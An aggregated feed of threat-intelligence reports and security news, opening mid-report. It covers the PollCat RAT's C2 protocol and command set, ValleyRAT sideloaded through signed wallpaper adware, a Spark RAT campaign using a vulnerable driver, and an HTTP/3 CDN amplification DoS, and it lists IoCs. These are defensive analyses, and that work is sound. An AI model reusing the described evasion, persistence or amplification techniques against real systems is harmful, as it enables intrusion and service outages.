a daily 09AM trigger. Once active, PollCat identifies the host as 129--<hostname> and iterates over the following C2s until registration succeeds: 1. https://sahi-finance[.]com 2. https://GamebarAppinformation[.]azurewebsites[.]net 3. https://GamebarApp[.]azurewebsites[.]net To register, it sends the following HTTP request to the C2: POST /beacon HTTP/1.1 Host: <c2-host> Content-Type: application/json {"clientId":"<client-id>","type":"poll","pcName":"<hostname>","userName":"<username>"} On successful registration, PollCat expects an unusual HTTP 400 response containing a socket identifier and optional timing values: HTTP/1.1 400 Content-Type: application/json {"socketId":"<socket-id>","pollInterval":<poll-interval-ms>,"jitterTime":<jitter-ms>} After registration, PollCat sends host information to /gate/hello , polls /gate/fetch for commands, and returns results through /gate/submit . All endpoints in use are presented in the table below. Method Endpoint Purpose POST /beacon Register the client and obtain a socketId and optional timing values. POST /gate/hello Submit host, user, domain, OS information, and its current privilege level. GET /gate/fetch?token=<socketId> Poll for commands. POST /gate/submit Submit a Base64-encoded command-result structure. GET /vault/<uuid> Retrieve a hosted file and write it to the victim machine. PUT /vault/push/ Upload a local file or file chunk to the C2. POST /gate/track Report chunk-upload progress. By default, PollCat RAT polls every two minutes with up to five seconds of jitter. Commands and results are stored as little-endian binary records and carried as Base64 text. PollCat RAT declares 22 commands, but three of them have no implementation: Command Functionality 0x02 (DIR) List a directory. 0x03 (MV) Move a file or directory. 0x04 (RUN) Execute a shell command. 0x05 (TASKLIST) List running processes. 0x06 (DEL) Delete a file or directory. 0x07 (UPLOAD) Download a file from the C2 to the victim’s machine. 0x08 (DOWNLOAD) Upload a local file to the C2. 0X09 (DRIVES) List drives, volumes, or mount points. 0X0A (TERMINATE) Terminate a process by PID. 0X0B (RUNDLL) Load a DLL and call an exported function on Windows. 0X0C (MKDIR) Create a directory. 0X0D (ZIP) Create or extract a ZIP archive. 0X0E (CHUNKED_DOWNLOAD) Upload a local file in chunks. 0X0F (RUN_HIDDEN) Start a hidden background process. 0X20 (EVAL_JS) Execute JavaScript supplied by the C2. 0X30 (SYSTEM_CHECK) Collect process and software inventory. 0XA1 (WS_DOWNLOAD) Defined but not implemented. 0xB0 (REQUEST_ELEVATION) Defined but not implemented. 0XB1 (PERSIST) Defined but not implemented. 0xF0 (SET_SLEEP_TIME) Change the polling interval. 0XF1 (SET_IDLE_TIME) Store an idle-time value. 0xF2 (SET_JITTER_TIME) Change polling jitter. The command names UPLOAD , DOWNLOAD , and CHUNKED_DOWNLOAD are written from the C2’s perspective. UPLOAD sends a C2-hosted file to the victim’s machine, while the two download commands transfer victim files back to the C2. EVAL_JS runs JavaScript supplied by the C2 and gives that code access to Node.js modules, files, processes, networking, and child-process functions. SYSTEM_CHECK collects the names of running processes and lists files and folders from: %SystemDrive%\Program Files %SystemDrive%\Program Files (x86) %LOCALAPPDATA% %LOCALAPPDATA%\Programs %APPDATA% %USERPROFILE% %APPDATA%\Microsoft\Outlook %LOCALAPPDATA%\Microsoft\Olk\Attachments %USERPROFILE%\Documents It also searches for folders matching 24 hardcoded strings corresponding to security software vendor names: ‘Google’, ‘Microsoft’, ‘Palo Alto Networks’, ‘Cisco’, ‘VMware’, ‘Fortinet’, ‘Citrix’, ‘CheckPoint’, ‘Juniper Networks’, ‘LogMeIn’, ‘Sophos’, ‘Symantec’, ‘Trend Micro’, ‘McAfee’, ‘Kaspersky Lab’, ‘ESET’, ‘Bitdefender’, ‘Avast Software’, ‘CrowdStrike’, ‘SentinelOne’, ‘Malwarebytes’, ‘BraveSoftware’, ‘Tencent’, and ‘Naver’. When PollCat finds a matching folder, it lists that folder’s root contents. It does not recursively scan the entire product directory. The detailed inventory, including process names, directory listings, and collected paths, is sent as JSON to POST /api/system-details/result . Infrastructure Mirage Kitten continues to rely on Azure Websites and Cloudflare-backed domains to hinder infrastructure discovery and tracking. More importantly, the use of Microsoft Azure subdomains for C2 helps the traffic blend into legitimate organizational network activity. In some cases that we encountered during our research, the actors even incorporated the targeted organization’s name into the Azure subdomain, making C2 communications appear more like normal business traffic originating from an employee machine during regular business days. Domain Registrar ASN Malware sample naturalapplication.azurewebsites[.]net retaildemo.azurewebsites[.]net tubitak.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 1 rgbteller.azurewebsites[.]net wslwebui.azurewebsites[.]net plugplay.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 2 crossdwm.azurewebsites[.]net wdisystem.azurewebsites[.]net wslmenus.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 3 dnshnsdev.azurewebsites[.]net hpjumpsrv.azurewebsites[.]net storview.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 4 healthcomfsdpower[.]com visitfinancedentists[.]com NameCheap, Inc. AS 13335 NodeRabbit RAT sample 5 kyrasey-f8hfexa5cqamh7fk.westeurope-01.azurewebsites[.]net MarkMonitor Inc. AS 8075 greenyjsgfd.azurewebsites[.]net helptellerbls.azurewebsites[.]net timedrv.azurewebsites[.]net userwellgtfs.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 6 hecowime-aqdphyd4bbdef6es.westeurope-01.azurewebsites[.]net msmanagementgrp[.]com msmanagementgrpmedia[.]com MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 7 lifespotify[.]com Dynadot AS 8075 PollCat RAT gamebarapp.azurewebsites[.]net gamebarappinformation.azurewebsites[.]net MarkMonitor Inc. sahi-finance[.]com NameCheap, Inc. Based on our analysis of Mirage Kitten’s infrastructure, we identified certain patterns across several command-and-control channels, including msmanagementgrp[.]com and visitfinancedentists[.]com Further investigation based on these patterns led to the discovery of approximately 11 additional infrastructure assets attributed to the same group. Domain Creation date Registrar healthful-hub[.]com 2026-07-03 NameCheap, Inc. neumedicahealthcare[.]com 2026-07-03 NameCheap, Inc. optimumhealthcredit[.]com 2026-07-03 NameCheap, Inc. healthfullyrecipes[.]com 2026-06-30 NameCheap, Inc. refreshhealthandwellness[.]com 2026-06-09 NameCheap, Inc. healthvitalitycare[.]com 2026-05-18 NameCheap, Inc. aceofspadesmanagement[.]com 2026-05-18 NameCheap, Inc. glmediaagency[.]com 2026-05-18 NameCheap, Inc. digimediaskill[.]com 2026-05-18 NameCheap, Inc. healthyweightplan[.]com 2026-05-18 NameCheap, Inc. mens-health-online[.]com 2026-05-15 NameCheap, Inc. Victims Based on our telemetry, we identified victims in fintech, aviation and aerospace sectors across the Middle East and Africa – specifically, in Egypt, Ethiopia and Afghanistan. We also observed submissions of ZIP archives with trojanized projects containing NodeRabbit and PollCat to an online multi-scanner originating from several countries, including India, Türkiye, Israel, Iraq, Germany, and Ireland. Attribution We attribute this activity to Mirage Kitten with a high degree of confidence based on the following observations: Structural similarities with the Retrograde/ MiniFast native DLL backdoor (MD5: 810F8E3B88EB05F710C09552941D6F56 ) Initial C2 handshake and session establishment logic. Both PollCat and Retrograde/MiniFast follow a similar C2 handshake flow. Each builds a JSON request body containing host information and sends it via an HTTP POST request. Notably, both treat HTTP 400 as a successful handshake response rather than an error, parsing the response body to extract a socketId , which is then stored and used as the session token for subsequent C2 communication. Similar C2 handshake and socketId session establishment logic in MiniFast/Retrograde and PollCat Host registration. Both PollCat and Retrograde/MiniFast register the infected host with the C2 server by sending a structurally similar JSON request body containing the session token and host information. Malware Host registration request body C2 endpoint PollCat {“token”:”<socketId>”,”pcName”:”<host>”,”userName”:”<user>”,”domainName”:”<domain>”,”os”:”<os>”,”isElevated”:false} /gate/hello MiniFast/Retrograde {“token”:”<socketId>”,”pcName”:”<host>”,”userName”:”<user>”,”domainName”:”<USERDOMAIN>”,”isElevated”:<bool>} /agent/init Command fetching similarities. The similarities extend to command retrieval. Both PollCat and Retrograde/MiniFast periodically poll the C2 server using an HTTP GET request containing the previously assigned socketId as a token. Retrograde/MiniFast uses GET /agent/poll?token=<socketId> , while PollCat follows the same pattern with GET /gate/fetch?token=<socketId> , demonstrating a closely aligned C2 communication structure. Beacon timing similarities. PollCat and the Retrograde/MiniFast share identical beacon timing defaults: a polling interval of 120,000 ms ( 0x1D4C0 ), a jitter of 5,000 ms ( 0x1388 ), and a retry timeout of 60,000 ms ( 0xEA60 ). This further highlights the structural similarities between the two C2 communication implementations. Command set similarities. PollCat and Retrograde/MiniFast share several commands and command IDs. Notably, PollCat declares REQUEST_ELEVATION (0xB0) and PERSIST (0xB1) but does not implement them. In MiniFast, both are functional: 0xB0 performs UAC elevation, while 0xB1 creates the WindowsSecurityUpdate scheduled task for persistence. Command set similarities between MiniFast/Retrograde and PollCat, including shared command identifiers Proxy authentication similarities. NodeRabbit delegates corporate-proxy NTLM/Negotiate authentication to curl.exe --proxy-anyauth --proxy-user , using the victim’s logon session. Retrograde/MiniFast native DLL implements the same approach natively through WinHttpQueryAuthSchemes and WinHttpSetCredentials with NULL credentials. This shared proxy-aware C2 design suggests the same development approach across both malware families. Speaking of victimology, the attacks are consistent with Mirage Kitten’s known geographic targeting, with the group maintaining a strong focus on entities across Africa and the Middle East, this time with a particular focus on the aviation and FinTech sectors. As for the operational infrastructure, Mirage Kitten has historically hosted its initial ZIP lures on legitimate third-party services. Previously, it used onlyoffice.com for this purpose. In this activity, the group shifted to Amazon S3 buckets. Finally, the combination of Azure Websites and Cloudflare‑backed domains has been a hallmark of Mirage Kitten’s TTPs, which we have observed across NodeRabbit and PollCat. Conclusions Mirage Kitten’s latest activity marks a notable evolution in the group’s tooling: NodeRabbit and PollCat are the group’s first Node.js/JavaScript-based implants, departing from its usual native malware deployed through DLL search-order hijacking. The shift to cross-platform scripting gives the operators a single codebase that runs on Windows, Linux, and macOS, with payloads that blend naturally into developer workstations. The delivery mechanism, however, remains consistent with Mirage Kitten’s historical tradecraft: the use of recruiter personas on LinkedIn to target critical sectors across the Middle East and Africa for cyberespionage purposes. We continue to track the group’s activity and will report on new developments in future publications. Indicators of compromise Additional IoCs are available to customers of our Threat Intelligence Reporting service. For more details, contact us at [email protected] . File hashes CBAAF0900A13F28E380F49ADECEC932C   FrontEnd-Task.zip 1EA83E4E4592B01E4ACAB63EB867BEE5   Front-Technical-Challenge.zip 366515822D5AC1CC500711EF57A2E32E   Task-FullStack.zip CF449F1992C2819E62AC44A0B06AC2E7   fullstack-1536.zip E95A4366686E3F786EA3C056FAB5B0DA   webapp76592.zip DE5AF16A3757EF700B01DC34D67079AE   webapp76531.zip BE086789568441D0D7E4679AEE51F566   challenges-17831.zip E259C5EDF158AAC4CFE14F77DDD0B196   challenges-17832.zip 291AC3ABE73C5158E59A437B75D5F0AA   Project-1802.zip 0962F56D7EC69F4F2A0162DCBE22116B   Case-34234.zip 795E053A990A1569FFDCB57F48F6D085   RankChallenge-react-6uJSX3-main.zip Domains and IPs oracle-challenge.s3[.]us-east-1.amazonaws[.]com naturalapplication.azurewebsites[.]net retaildemo.azurewebsites[.]net tubitak.azurewebsites[.]net rgbteller.azurewebsites[.]net wslwebui.azurewebsites[.]net plugplay.azurewebsites[.]net crossdwm.azurewebsites[.]net wdisystem.azurewebsites[.]net wslmenus.azurewebsites[.]net dnshnsdev.azurewebsites[.]net hpjumpsrv.azurewebsites[.]net storview.azurewebsites[.]net healthcomfsdpower[.]com visitfinancedentists[.]com kyrasey-f8hfexa5cqamh7fk.westeurope-01.azurewebsites[.]net greenyjsgfd.azurewebsites[.]net helptellerbls.azurewebsites[.]net timedrv.azurewebsites[.]net userwellgtfs.azurewebsites[.]net hecowime-aqdphyd4bbdef6es.westeurope-01.azurewebsites[.]net msmanagementgrp[.]com msmanagementgrpmedia[.]com lifespotify[.]com gamebarapp.azurewebsites[.]net gamebarappinformation.azurewebsites[.]net sahi-finance[.]com healthful-hub[.]com neumedicahealthcare[.]com optimumhealthcredit[.]com healthfullyrecipes[.]com Refreshhealthandwellness[.]com healthvitalitycare[.]com aceofspadesmanagement[.]com glmediaagency[.]com digimediaskill[.]com healthyweightplan[.]com mens-health-online[.]com
securelist.comSep 1, 2026extracted
ValleyRAT Backdoor Hides in Signed Adware That Users Add to Antivirus Exclusions
The threat actor known as Silver Fox has been observed distributing the ValleyRAT backdoor disguised as a signed Chinese adware application, running the malware under a trusted process to slip past users who add such software to their antivirus exclusions. Russian cybersecurity vendor Kaspersky said the attackers built the disguise around QN Wallpaper, a genuine Chinese desktop-wallpaper tool that in its unmodified form is adware, bundling partner apps and displaying ad banners. Once installed, ValleyRAT (also tracked as Winos 4.0) hands the operator full control of the compromised machine. Kaspersky said the attack's geography and payload point to Silver Fox as the likely group behind it, and urged users to avoid software of questionable reputation and to keep it away from security-tool exclusions. "This case is a clear example of how adware and affiliate networks can turn out to be far more dangerous than they appear. ValleyRAT is a sophisticated backdoor capable of collecting sensitive data such as keystrokes and clipboard contents, taking screenshots, and delivering additional malicious modules," Kaspersky said in its analysis. The disguise relies on DLL sideloading. The installer unpacks a modified copy of QN Wallpaper and runs its signed executable, QnWallpaper.exe, which loads a malicious libcef.dll planted in the same directory. With the library executing inside a legitimately signed process, the backdoor runs without triggering controls that trust the signature. Before the adware component starts, the installer switches off Windows Defender through the DisableAntiSpyware registry key and adds the program to the system's autorun entries. When the logged-in user lacks administrator rights, the malware relaunches itself with runas to acquire them. ValleyRAT can also flag its own process as critical, so that any attempt to terminate it triggers a blue screen of death. Kaspersky shared the following indicators of compromise (IoCs) - Hashes (MD5): c24e99f9437feacaa63766a3cde3fe3d (the submitted installer),07ddbbe2c71c45577a7a4fbcdba0df91 (the maliciouslibcef.dll ), and8a626d844943da3456b044f38deae3a2 Command-and-control servers: 103.45.66.18 on ports 441, 442 and 443, and 192.253.225.173 on ports 6666 and 8888 Domains in the chain: qnwallpaper[.]keansoft[.]cn, the abused adware's download site, and meeting[.]tencent[.]com, a legitimate page opened as a decoy Host artifacts: the DisableAntiSpyware registry value and the install directoryC:\Program Files\QNWallpaper\5.4.0.1662\ DLL sideloading through signed, legitimate software is an established part of Silver Fox's toolkit. In a campaign against a Japanese manufacturer about five weeks earlier, Cato Networks documented what it called the group's "newly observed abuse of legitimate applications for DLL sideloading," and the same libcef.dll filename had already featured in a 2025 ValleyRAT loader. Kaspersky itself tracked the group in an earlier tax-themed campaign against organizations in India and Russia. Kaspersky's account is based on a single installer submitted by a customer; its advertising features stay inert while the infection chain runs, and the report stops short of attaching a victim count to the adware route. Across 2026 the vendor recorded more than 100,000 detections of ValleyRAT and associated malware affecting over 1,500 unique users, mostly in China and India, a figure spanning all of the year's ValleyRAT activity rather than this campaign alone. Kaspersky also urged organizations to set clear policies on third-party software on work devices and to keep staff aware of the threat. "For individual users, we recommend avoiding the installation of software with a questionable reputation, and, even more importantly, never adding such software to your security solutions' exclusion lists," the company said.
thehackernews.comAug 31, 2026extracted
ValleyRAT masquerading as adware
Attackers typically try to pass off malware as legitimate applications or as potentially unwanted programs that users deliberately search for and download, such as cheats or cracks. They often rely on ad and affiliate networks to deliver their creations to victims’ devices. This post examines a less conventional case: a well-known backdoor distributed under the guise of adware. The attackers may have chosen this distribution method because the adware was signed by the developer. On top of that, users often manually add these apps to exclusions, so their useful features don’t get blocked. Some time ago, a client asked us to analyze a file with the MD5 hash c24e99f9437feacaa63766a3cde3fe3d and add it to our detection database. We initially classified it as adware, but a cursory analysis turned up suspicious network activity, which prompted us to dig deeper. It turned out the sample did far more than serve ads. In fact, its advertising functionality doesn’t even work; instead, it triggers an infection chain that delivers the ValleyRAT backdoor. Malicious installer The file the client shared with us turned out to be an installer that performed different actions depending on the two-letter suffix used in the file name, positioned just before the numeric string. Installer name What it does FS_SETUP_DD_173.exe Installs DingTalk, a workplace collaboration platform FS_SETUP_GG_173.exe Installs Google Chrome FS_SETUP_HY_173.exe Opens hxxps://meeting[.]tencent[.]com/download/ These actions are most likely designed to divert the user’s attention away from the sample’s malicious functionality. Regardless of the file name, the installer deploys a modified Chinese desktop wallpaper management tool called QN Wallpaper (hxxps://qnwallpaper[.]keansoft[.]cn/) and adds it to the registry’s autorun entries. The original version of QN Wallpaper is genuine adware: on installation, it delivers bundled partner apps to the device and then displays ad banners to the user. In this case, however, the attackers use it to carry out DLL sideloading , a technique that allows malicious code to run under the guise of a signed process by way of a malicious DLL. The QN Wallpaper modules, along with the malicious components, are unpacked to C:\Program Files\QNWallpaper\5.4.0.1662\<random string of letters and digits>. The following files are saved in that directory: File name MD5 Purpose 1.zip 7ad1e3ef4e6d9d636c9e7e967733850e Archive containing the adware files QnWallpeper.exe and QnwPlayer.exe, along with the modules needed to run them 7z.dll 96b4c1d0683dce22bd3223e1e40689c1 7z archiver library 7z.exe 9b86d3ab6cef15c633933fbbeab39c0a Archiver chrome_elf.dll edfdc30cbd85879776b8f735ea7de1f1 Library used to launch Electron-based applications libcef.dll 07ddbbe2c71c45577a7a4fbcdba0df91 Malicious library PeLoader 48826d5ca845979d2e6ebd66dc1aae90 File containing the encrypted backdoor QnWallpaper.exe 6c158c0f8e029342192d4f0d72e102b7 Adware module QnwPlayer.exe 9a71d6a41cd258b9e89cdc5fc224de73 Adware module <random string of letters and digits>Nedca.exe c24e99f9437feacaa63766a3cde3fe3d Malicious installer copy After unpacking, the installer uses the DisableAntiSpyware registry key to disable Windows Defender and then launches QnWallpaper.exe. Disabling Windows Defender DLL Sideloading via libcef.dll QnWallpaper.exe has dependencies in libcef.dll, so this library gets loaded when the process starts. QnWallpaper.exe also launches QnwPlayer.exe, which likewise calls libcef.dll. QnWallpaper and QnwPlayer won’t actually function correctly, because the functions exported from libcef.dll are put into an infinite sleep. However, in case that sleep is ever interrupted, the attackers have implemented a function that loads all the necessary functions from the original library into memory, provided it can locate that library on the system. Example of an exported function Loading functions from the original libcef.dll The malicious functionality in libcef.dll is invoked by a call to DllMain, which runs automatically when the library is loaded. That said, alongside the original exports, the library also contains a function named RunDLL, which likewise initiates execution of the malicious code. QnWallpaper never calls this function. We suspect the attackers intended to invoke it manually via rundll32 or planned to use a separate executable for this purpose, one that wasn’t included in the package downloaded by the sample. The RunDLL function Running the malicious code When the library is loaded, code runs that ensures QnWallpaper.exe persists at startup: it adds a file extension association and drops a file with the corresponding extension in C:\Documents and Settings\<username>\Start Menu\Programs\Startup\. This is followed by a chain of wrapper functions whose main job is to call the next one. Execution eventually reaches the function that contains the actual malicious code. For convenience, we’ll refer to it as mw_entry. Inside mw_entry, the malware checks two things: Whether the current user belongs to the Administrators group Which process the DLL is running inside Checking for administrator privileges If the user isn’t a member of the Administrators group, the program attempts to obtain administrator privileges by using the runas utility. Relaunching the process to obtain administrator privileges Once it has administrator privileges, the malicious code determines which process the DLL has been loaded into, and selects the payload accordingly: If the library is running inside QnWallpaper.exe, the payload is loaded from the PeLoader file. Encrypted payload If the library is running inside QnwPlayer.exe, the payload is loaded from libcef.dll resources. Retrieving the payload from a resource Both payloads are AES-encrypted DLLs that contain the ValleyRAT backdoor. The only difference between them is their configuration, specifically, the C2 server addresses. After decryption, libcef.dll checks the magic signatures in the resulting PE file’s headers to confirm the sample is valid. If this check fails, the library releases its resources and takes no further action. Validating the PE file headers after decryption If the headers check out, libcef.dll loads the payload into the process’s memory space and hands control over to the backdoor by calling DllMain. Calling DllMain ValleyRAT ValleyRAT begins its operation by parsing its configuration, which consists of key:value pairs concatenated into a single string. To obfuscate this configuration, the attackers wrote the string in reverse. Obfuscated configuration During parsing, the backdoor restores the correct character order and reads the key values one by one. The set of keys is the same regardless of which process the backdoor is running in. Parsing the configuration Some of the configuration fields are listed below: Key Description p? C2 server IP address o? C2 server port t? Protocol (1: TCP, 0: UDP) dd Sleep duration before executing the main code cl Sleep duration after receiving the corresponding command from the server bz Configuration creation date bh Whether to mark the current process as critical (so that terminating it triggers a blue screen of death) Possible values: 1: yes, 0: no ll Whether to check for running security/traffic-analysis tools/processes (1: check, 0: do not check) sh Whether to inject code into svchost that will restart the malicious process (1: inject, 0: do not inject) The backdoor uses several techniques to protect its process. Some are configuration-dependent, while others are always applied: Injecting code into svchost to restart the process: a configurable option. The backdoor allocates memory inside the svchost process, injects code into it, and sets PAGE_NOACCESS permissions on the memory page containing the injected data. It then creates a suspended thread, waits 60 seconds, grants read, write, and execute permissions on the page, and resumes the thread. Injecting code into svchost The function injected into the process has a single job: restart the backdoor if its execution is interrupted for any reason. Injected function Marking its own process as critical (so that terminating it triggers a blue screen of death): a configurable option. Setting its own process as critical Restarting on an unhandled exception. This protection mechanism is always active, regardless of the backdoor’s configuration. Restarting on exceptions The backdoor also has spyware functionality. While running, it tracks keystrokes and the currently focused window by using functions from the DirectInput8 library. It also captures clipboard contents. All collected data is saved to a file on disk. Capturing clipboard data If the ll key in the configuration is set to 1, ValleyRAT periodically checks for active windows belonging to applications that could be used to analyze processes or traffic. Window enumeration is done via the EnumWindows function, using the following callback: Window name checks After completing these checks, the backdoor collects system information, including: Host name Host IP addresses User idle time Detailed Windows version information (ProductName, EditionId, DisplayVersion) Number of CPU cores Free disk space Graphics adapter Currently focused window and its title System bitness Language settings Path to the system directory On command, the backdoor can perform the actions typical of this malware category: Rebooting the computer Shutting down the computer Taking a screenshot Wiping logs Updating its C2 addresses Downloading additional modules Sending keylogger logs along with clipboard contents Snippet of the command handler Let’s take a closer look at the module-loading functionality. Upon receiving the corresponding command with a link from its operator, the backdoor downloads the file at that link and executes it. The download can come from either the C2 server or a third-party address. The DownloadPeFile function is responsible for downloading a PE file The DownloadAndExecute function calls DownloadPeFile, then launches the downloaded module Additional modules can take the form of purpose-built dynamic libraries or shellcode. If the payload is shellcode, the backdoor uses process hollowing with svchost to launch the module. Implementation of the process hollowing technique If the module is a dynamic library, the backdoor loads the PE file into its own process, calls DllMain, and searches for a Main function among the exported functions. Once Main has been called, the library is unloaded from memory. Calling DllMain after the backdoor loads the PE file Targets and attribution Over the course of 2026, we detected the ValleyRAT backdoor and its associated malware more than 100,000 times, with more than 1500 unique users affected, primarily in China and India. This attack geography, combined with the use of the ValleyRAT backdoor, points to Silver Fox , a known operator of this malware family, as the likely group behind the campaign. Conclusion This case is a clear example of how adware and affiliate networks can turn out to be far more dangerous than they appear. ValleyRAT is a sophisticated backdoor capable of collecting sensitive data such as keystrokes and clipboard contents, taking screenshots, and delivering additional malicious modules. The attackers exploited a well-known adware application to run the backdoor under the guise of a signed process, which complicates detection. Motivated by both cyberespionage and financial gain, Silver Fox targets organizations across multiple countries. To stay protected, organizations should keep employee cybersecurity awareness up to date and enforce clear policies on the use of third-party software on work devices. For individual users, we recommend avoiding the installation of software with a questionable reputation, and, even more importantly, never adding such software to your security solutions’ exclusion lists. IoC MD5 07ddbbe2c71c45577a7a4fbcdba0df91 c24e99f9437feacaa63766a3cde3fe3d 8a626d844943da3456b044f38deae3a2 Network 103.45.66.18:441 103.45.66.18:442 103.45.66.18:443 192.253.225.173:6666 192.253.225.173:8888
securelist.comAug 31, 2026extracted
Spark RAT Targets Cambodia, Abuses Vulnerable OPSWAT Driver to Disable Security Tools
Individuals and organizations in Cambodia have emerged as the target of a new campaign that delivers an open-source remote access trojan (RAT) called Spark RAT. "The samples employ diverse lure themes, suggesting an effort to appeal to a broad range of potential victims. These include government notices, public health materials, real estate-related content, and other topics," Acronis Threat Research Unit (TRU) researchers Darrel Virtusio and Subhajeet Singha said in an analysis published Wednesday. The multi-stage attack is notable for employing the bring your own vulnerable driver (BYOVD) technique to load a legitimate-but-vulnerable driver associated with OPSWAT AppRemover ("ardrv.sys") to escalate privileges and neutralize security software. Attack chains likely make use of targeting phishing emails to distribute compressed archives containing an Inno Setup executable and trick recipients into running it using wide-ranging lures, including Cambodian government notices, public health announcements, dental examination records, real estate documents, and promotional offers. Acronis said it discovered a number of malicious artifacts between late June through early August 2026, although it's unclear if the campaign remains ongoing. The Inno Setup installer is designed to trigger a DLL side-loading chain using a signed Tencent executable, which then delivers interim payloads responsible for deploying the vulnerable "ardrv.sys" and then launching the Spark RAT payload. Spark RAT is an open-source, Go-based cross-platform RAT that enables remote control of compromised devices. The DLL loader also carries out a timing-based anti-sandbox check to detect environments that shorten or manipulate sleep delays, and proceeds to terminate execution if the elapsed time falls outside the expected range. Furthermore, it reviews running processes for those related to Huorong Internet Security ("HipsTray.exe"), a Chinese endpoint security program. If the process is present, the loader attempts to weaken the privileges of the security product. In the next stage, it decrypts shellcode concealed within a PNG file present in the archive to run a second stager, which verifies if it is running with SYSTEM privileges. "Based on these checks, the payload selects one of two execution modes," Acronis said. "If it is already running as SYSTEM, it proceeds directly to inject mode, bypassing the persistence setup and executing the next stage. Otherwise, it enters setup mode, where it establishes persistence first, then executes the next stage." The inject mode works by parsing and decrypting shellcode embedded in another PNG file from the archive, and then injecting it into "vssvc.exe" and executing it within the context of the target process. To ensure the injected payload remains running, it monitors the "vssvc.exe" instance and re-injects the shellcode if the process terminates or restarts with a new PID. In the setup mode, the malware reads and decrypts the shellcode from the same file, after which it checks for a list of hard-coded processes associated with Qihoo 360. If none of them are found, it sets up a Windows service-based persistence mechanism to launch the binary that sideloads the DLL to relaunch the entire cycle all over again. After establishing persistence on the host, it injects the shellcode into "vssvc.exe" like before. The payload performs the following sequence of actions - Attempt to patch AMSI and ETW related functionality Setup persistence using a scheduled task Install the ardrv.sys driver that's vulnerable to CVE-2026-36425 to terminate security-related processes such as Microsoft Defender, Huorong Internet Security, and Tencent PC Manager Read and decrypt another embedded payload from a third PNG file to perform user-mode termination of hard-coded security processes Simultaneously, a fourth PNG-based payload file is processed to extract and decrypt shellcode that's injected into "ctfmon.exe," ultimately leading to the execution of Spark RAT. Interestingly, the BYOVD routine references a number of other drivers, including those part of TrueSight and Zemana Anti-Malware SDK, both of which have been put to use by the Silver Fox threat actor prior to dropping Winos 4.0 (aka ValleyRAT). In addition, the targeting of Huorong security processes has been repeatedly observed in past Silver Fox-related attacks. Other Silver Fox-style indicators include targeting overlaps, the use of DLL sideloading through a signed application, multi-stage payload delivery, persistence through Windows services and scheduled tasks, and Microsoft Defender exclusions. Despite these similarities, there is not enough evidence to definitively attribute the latest activity to the threat actor. This assessment, Acronis said, is based on the absence of shared infrastructure, function-level code reuse, and matching certificates. Another crucial differentiator is the choice of the malware itself. While Silver Fox campaigns are known to leverage ValleyRAT and other custom payloads, it has not been attributed to the deployment of an open-source RAT. "This difference does not rule out a relationship, since operators can change payloads, but it removes one of the stronger links used in previous attributions," the cybersecurity company added. "The Spark RAT configuration contains a Chinese-language value, and the malware targets several security products commonly used in Chinese-speaking environments." "We therefore track the activity as an unattributed cluster with possible Chinese-language development or deployment links and operational similarities to the broader Silver Fox ecosystem. This assessment remains low confidence and may change if additional code, infrastructure, victimology, or other attributional evidence is identified."
thehackernews.comAug 27, 2026extracted
CDN Tsunami Attack Abuses HTTP/3 Translation for Up to 350x DoS Amplification
Cybersecurity researchers have disclosed two denial-of-service (DoS) attacks that exploit how major content delivery networks (CDNs) convert client-facing HTTP/3 traffic into HTTP/1.1 requests to the websites they front, amplifying a low-bandwidth request stream by up to 350x against the origin server. The attacks, collectively named "CDN Tsunami," were evaluated against Alibaba, Baidu, Cloudflare, Amazon CloudFront, Fastly, and Tencent. All six were found susceptible to the bandwidth variant and five to the connection variant, with Cloudflare unaffected by the latter because it buffers the complete request before opening a connection to the origin. The attack requires a website hosted on one of the six providers, with HTTP/3 serving at the edge, and no configuration changes on the website's part. The paper lists HTTP/3 as enabled by default at Cloudflare and CloudFront. However, Cloudflare's documentation describes HTTP/3 as available on all plans and provides steps to enable it, rather than stating it is enabled by default. AWS documentation gives http2 as the default HTTP version for new CloudFront distributions. The 350x factor applies only to Alibaba, Baidu, and Tencent. These three providers support the QPACK dynamic table, and it was measured at roughly 64 concurrent streams, with the maximum on Cloudflare, CloudFront, and Fastly ranging from 36.41x to 51.2x. No CVE identifiers have been assigned, and no exploitation in the wild is reported. While Baidu and Tencent confirmed the reports and deployed the proposed fixes, the researchers say every mitigation proposed is applied at the CDN rather than at the origin website. The two techniques are named HTTP/3 Bandwidth Amplification (HBA) and HTTP/3 Connection Amplification (HCA), and both rest on the same deployment gap, in which a CDN speaks HTTP/3 to the browser but only HTTP/1.1 to the website behind it, a mismatch the team said exists because "CDNs do not support end-to-end HTTP/3." HBA leverages QPACK, the header compression format introduced with HTTP/3. Because HTTP/1.1 carries no equivalent mechanism, the CDN has to expand every small index value it receives back into a full raw header before forwarding the request, so a request costing the attacker a few bytes on the wire costs the origin the decompressed size. Attacker-side bandwidth stayed below 500 Kbps against the three CDNs supporting the dynamic table and below 5 Mbps against the rest, while bandwidth consumption measured at the origin exceeded 100 Mbps throughout. The dynamic table variant requires the attacker first to send one HTTP/3 request carrying a large header, which the CDN inserts into the table, and then reference that entry repeatedly using small index values. Support is limited to Alibaba, Baidu, and Tencent, each advertising a 4KB table with a maximum entry size of 3,072 bytes. The maximum bandwidth amplification factors measured using the QPACK static table are as follows - Baidu, 66.06x, dynamic table supported Alibaba, 65.8x, dynamic table supported Tencent, 54.08x, dynamic table supported Amazon CloudFront, 51.2x, no dynamic table support Cloudflare, 48.27x, no dynamic table support Fastly, 36.41x, no dynamic table support HCA targets connection capacity rather than bandwidth. Five of the six CDNs open an HTTP/1.1 connection to the origin as soon as they receive the HTTP/3 HEADERS frame, before the request body arrives, and HTTP/3 multiplexing allows a single client connection to carry multiple streams, each of which triggers its own backend TCP connection. Sending DATA frames at a very low rate then keeps those connections open, with the CDN continuing to treat the request as incomplete. Against an Apache server configured with a 300-second timeout and a 256-connection limit, four HTTP/3 connections, each multiplexing 96 streams, forced 384 backend connections, while Fastly required 48 connections of 8 streams because it caps backend connections at 10 per HTTP/3 connection. Response times for a benign client reached 60 seconds on Alibaba and up to 90 seconds on Baidu and CloudFront, both returning HTTP 504 Gateway Timeout, while Fastly rose to 15 seconds and returned HTTP 503 Service Unavailable. Tencent closed the client-side connection roughly 10 seconds after receiving a probe request and returned no response. The experiments were bounded by limits the researchers imposed on 